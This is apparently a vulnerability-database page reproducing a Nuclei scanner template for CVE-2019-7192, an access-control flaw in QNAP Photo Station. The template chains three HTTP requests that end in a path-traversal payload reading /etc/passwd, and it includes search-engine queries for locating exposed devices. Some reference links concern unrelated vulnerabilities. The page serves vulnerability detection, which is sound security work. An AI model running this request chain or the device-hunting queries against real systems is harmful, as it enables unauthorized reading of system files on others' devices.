CVE-2019-7192: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution

日期: 2025-08-01 | 影响软件: QNAP QTS and Photo Station 6.0.3 | POC: 已公开

漏洞描述

This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.

PoC代码[已公开]

id: CVE-2019-7192

info:
  name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7192
    - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
    - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2546
    - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7192
    cwe-id: CWE-863
    epss-score: 0.94071
    epss-percentile: 0.99899
    cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: qnap
    product: photo_station
    shodan-query:
      - 'Content-Length: 580 "http server 1.0"'
      - http.title:"photo station"
      - http.title:"qnap"
      - 'content-length: 580 "http server 1.0"'
    fofa-query:
      - title="photo station"
      - title="qnap"
    google-query:
      - intitle:"qnap"
      - intitle:"photo station"
  tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss

http:
  - raw:
      - |
        POST /photo/p/api/album.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        a=setSlideshow&f=qsamplealbum
      - |
        GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        POST /photo/p/api/video.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "admin:.*:0:0:"

      - type: word
        part: header_3
        words:
          - video/subtitle

      - type: status
        part: header_3
        status:
          - 200

    extractors:
      - type: regex
        name: album_id
        part: body_1
        group: 1
        regex:
          - '<output>([a-zA-Z]+)<\/output>'
        internal: true

      - type: regex
        name: access_code
        part: body_2
        group: 1
        regex:
          - encodeURIComponent\('([A-Za-z0-9]+)'\)
        internal: true
# digest: 490a00463044022054fd30d65679d5d8944e16cbb8887caf3e1cab9ca5891c80d82dbd3699d41be3022064ebf4d58f5fc17e7e440663eda9c529c529faaf96fb963e81a19dda907fb78d:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-7192.yaml